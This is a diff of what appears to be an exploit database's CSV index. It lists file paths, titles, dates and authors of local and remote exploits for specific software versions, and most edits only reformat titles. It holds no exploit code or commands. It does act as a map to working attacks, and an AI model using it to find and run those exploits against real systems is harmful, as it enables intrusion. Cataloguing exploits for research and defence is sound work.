+21499,platforms/linux/local/21499.txt,"QNX RTOS 4.25 - 'CRTTrap' File Disclosure",2002-05-31,"Simon Ouellette",linux,local,0 21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0 @@ -8133,7 +8134,7 @@ id,file,description,date,author,platform,type,port 40409,platforms/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun",2003-06-24,posidron,windows,local,0 22836,platforms/linux/local/22836.pl,"Elm 2.3/2.4 - TERM Environment Variable Local Buffer Overrun",1997-05-13,kokanin,linux,local,0 -22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local,0 +22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local,0 22847,platforms/linux/local/22847.txt,"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions",2003-07-01,"Larry W. Cashdollar",linux,local,0 22851,platforms/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local,0 22860,platforms/linux/local/22860.c,"GNU Chess 5.0 - Local Buffer Overflow",2003-07-03,ace,linux,local,0 @@ -8153,8 +8154,8 @@ id,file,description,date,author,platform,type,port 22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Privilege Escalation (1)",2003-07-16,DVDMAN,unix,local,0 22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Privilege Escalation (2)",2003-07-16,nic,unix,local,0 22928,platforms/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 -22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct RETN)",2012-11-26,Nezim,windows,local,0 -22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Exploit (Direct Retn)",2012-11-26,Nezim,windows,local,0 +22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Direct RETN Exploit",2012-11-26,Nezim,windows,local,0 +22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn Exploit",2012-11-26,Nezim,windows,local,0 23007,platforms/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI (Metasploit)",2012-11-29,Metasploit,windows,local,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,unix,local,0 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow",2003-07-29,V9,linux,local,0 @@ -8228,7 +8229,7 @@ id,file,description,date,author,platform,type,port 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0 -23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File Exploit (DEP + ASLR Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 +23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File Exploit (ASLR + DEP Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0 23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0 23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,aix,local,0 @@ -8282,8 +8283,8 @@ id,file,description,date,author,platform,type,port 24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0 24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 -24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 -24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0 +24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation (1)",2004-11-17,Gangstuck,linux,local,0 +24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation (2)",2004-11-17,Gangstuck,linux,local,0 24753,platforms/windows/local/24753.txt,"Mailtraq 2.x - Administration Console Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0 24754,platforms/windows/local/24754.txt,"Altiris Deployment Solution 5.6 - Client Service Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0 24757,platforms/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0 @@ -8331,14 +8332,14 @@ id,file,description,date,author,platform,type,port 25703,platforms/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,solaris,local,0 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",linux,local,0 -25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 +25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 25725,platforms/windows/local/25725.rb,"AdobeCollabSync - Buffer Overflow Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,windows,local,0 40392,platforms/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",linux,local,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",linux,local,0 40389,platforms/windows/local/40389.php,"PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow",2016-09-19,"Yakir Wizman",windows,local,0 25883,platforms/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 - Field Buffer Overflow (SEH)",2013-06-02,xis_one,windows,local,0 25896,platforms/solaris/local/25896.pl,"Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local,0 -25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0 +25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring Exploit",2013-06-03,"Tavis Ormandy",windows,local,0 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite",2005-07-06,pi3ki31ny,linux,local,0 25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0 @@ -8352,7 +8353,7 @@ id,file,description,date,author,platform,type,port 26245,platforms/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0 26321,platforms/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",linux,local,0 26323,platforms/windows/local/26323.cpp,"Microsoft Windows XP - Wireless Zero Configuration Service Information Disclosure",2005-10-04,"Laszlo Toth",windows,local,0 -26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 +26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass",2005-10-17,anonymous,php,local,0 26353,platforms/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",linux,local,0 26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Buffer Overflow (SEH)",2013-06-21,Onying,windows,local,0 26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation",2013-06-21,Hunger,freebsd,local,0 @@ -8360,9 +8361,9 @@ id,file,description,date,author,platform,type,port 26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0 26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0 -26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (Direct Retn)",2013-06-24,Onying,windows,local,0 +26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0 -26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Buffer Overflow (Direct Retn)",2013-06-26,Onying,windows,local,0 +26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local,0 @@ -8373,7 +8374,7 @@ id,file,description,date,author,platform,type,port 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0 26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local,0 26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local,0 -28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0 +28085,platforms/windows/local/28085.html,"KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite",2013-09-04,blake,windows,local,0 26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player - '.LST' Buffer Overflow (Metasploit)",2013-07-03,Metasploit,windows,local,0 26703,platforms/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,windows,local,0 26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,windows,local,0 @@ -8381,7 +8382,7 @@ id,file,description,date,author,platform,type,port 26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0 -26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)",2013-07-16,PuN1sh3r,windows,local,0 +26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow",2013-07-16,PuN1sh3r,windows,local,0 40385,platforms/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 @@ -8404,7 +8405,7 @@ id,file,description,date,author,platform,type,port 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 -27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 +27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure",2006-03-23,"Pavel Kankovsky",linux,local,0 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 @@ -8412,7 +8413,7 @@ id,file,description,date,author,platform,type,port 27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,linux,local,0 27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0 27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 -28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 +28084,platforms/windows/local/28084.html,"KingView 6.53 - 'SuperGrid' Insecure ActiveX Control",2013-09-04,blake,windows,local,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL (Metasploit)",2013-09-06,Metasploit,windows,local,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,linux,local,0 28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC - Local Buffer Overflow",2006-07-27,"Dedi Dwianto",linux,local,0 @@ -8459,7 +8460,7 @@ id,file,description,date,author,platform,type,port 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Privilege Escalation",2006-12-18,anonymous,linux,local,0 29465,platforms/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Privilege Escalation",2007-01-15,"Matousec Transparent security",windows,local,0 29467,platforms/linux/local/29467.c,"Rixstep Undercover - Privilege Escalation",2007-01-15,"Rixstep Pwned",linux,local,0 -30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass with ROP)",2013-12-04,metacom,windows,local,0 +30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,windows,local,0 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass",2007-05-15,"Matousec Transparent security",multiple,local,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0 @@ -8641,7 +8642,7 @@ id,file,description,date,author,platform,type,port 34313,platforms/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console - WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0 34333,platforms/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local,0 -34331,platforms/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 +34331,platforms/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RETBuffer Overflow",2014-08-12,"Giovanni Bartolomucci",windows,local,0 34421,platforms/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One Exploit",2014-08-27,"taviso & scarybeasts",linux,local,0 34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,windows,local,0 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,windows,local,0 @@ -8661,7 +8662,7 @@ id,file,description,date,author,platform,type,port 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0 -35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 +35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0 35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0 @@ -8829,7 +8830,7 @@ id,file,description,date,author,platform,type,port 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite Buffer Overflow (SEH)",2015-09-15,Un_N0n,windows,local,0 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0 -38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 +38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38201,platforms/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38202,platforms/windows/local/38202.txt,"Microsoft Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38218,platforms/windows/local/38218.py,"IKEView.exe R60 - '.elg' Local Exploit (SEH)",2015-09-17,cor3sm4sh3r,windows,local,0 @@ -8862,7 +8863,7 @@ id,file,description,date,author,platform,type,port 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0 38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 38472,platforms/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 -38473,platforms/linux/local/38473.py,"Linux 3.17 - noexec File Security Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0 +38473,platforms/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,linux,local,0 38474,platforms/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local,0 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0 @@ -8941,7 +8942,7 @@ id,file,description,date,author,platform,type,port 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode (SEH)",2016-03-21,"Rakan Alotaibi",windows,local,0 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 -39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation",2016-03-28,"Google Security Research",linux,local,0 +39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor Privilege Escalation",2016-03-28,"Google Security Research",linux,local,0 39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Privilege Escalation",2016-03-28,mr_me,windows,local,0 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39666,platforms/windows/local/39666.txt,"Microsoft Windows Kernel - 'win32k.sys' Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 @@ -9127,7 +9128,7 @@ id,file,description,date,author,platform,type,port 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0 40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0 41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0 -41020,platforms/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local,0 +41020,platforms/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local,0 41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0 41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0 @@ -9221,7 +9222,7 @@ id,file,description,date,author,platform,type,port 41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0 42000,platforms/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local,0 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0 -42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0 +42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0 42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0 42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0 42076,platforms/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local,0 @@ -9311,6 +9312,7 @@ id,file,description,date,author,platform,type,port 43033,platforms/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,windows,local,0 43056,platforms/php/local/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",php,local,0 43057,platforms/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,windows,local,0 +43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9382,7 +9384,7 @@ id,file,description,date,author,platform,type,port 110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 -117,platforms/windows/remote/117.c,"Microsoft Windows XP/2000 - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135 +117,platforms/windows/remote/117.c,"Microsoft Windows XP/2000 - RPC Remote Non Exec Memory Exploit",2003-11-07,ins1der,windows,remote,135 119,platforms/windows/remote/119.c,"Microsoft Windows XP/2000 - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 @@ -9515,12 +9517,12 @@ id,file,description,date,author,platform,type,port 573,platforms/windows/remote/573.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (2)",2004-10-12,K-C0d3r,windows,remote,8000 577,platforms/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow",2004-10-15,class101,windows,remote,25 